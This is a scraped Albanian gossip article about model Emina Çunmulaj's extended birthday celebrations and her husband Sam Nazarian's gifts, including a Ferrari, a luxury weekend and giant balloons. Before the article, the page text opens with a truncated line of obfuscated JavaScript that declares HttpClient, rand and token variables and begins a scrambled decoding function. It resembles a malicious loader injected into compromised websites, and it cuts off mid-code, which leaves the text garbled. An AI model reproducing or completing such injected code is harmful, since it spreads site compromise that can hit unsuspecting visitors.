;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A mbarojnë ndonjëherë surprizat për Eminan ?!

By

Emina Çunmulaj festoi me 12 shtator ditëlindjen e saj të 31-të. Por dhuratat e surprizat nga bashkëshorti i saj nuk nisën e as nuk mbaruan atë ditë.

Befasitë nga Sam Nazarian fillimin e patën me blerjen e hiq më pak se një veture Ferrari në vlerë prej qindra mijëra dollarësh.

Vazhdimi ishte një vikend pushimi luksoz, sjellja e motrës së modeles nga New York dhe buqeta të panumërta me lule në secilin cep ku shkelte modelja.

Sot, tre ditë pas përfundimit të ditëlindjes, Emina është surprizuar me balona gjigand që shprehin dashurinë e iranianit për bashkëshorten shqiptare.

‘Ditëlindja që nuk përfundon kurrë, falë burrit tim’ – ka shkruar Çunmulaj në postimin e sotëm në Instagram.

Manjati i zingjirit të hoteleve me të cilin Emina kurorëzoi muaj më parë dashurinë vlerësohet të ketë një pasuri që kap shifra miliarda dollarësh dhe këtu qëndron arsyeja se përse luksi është bërë një gjë e pandashme për modelen shqiptare. /Prive.al/

Artikuj të ngjashëm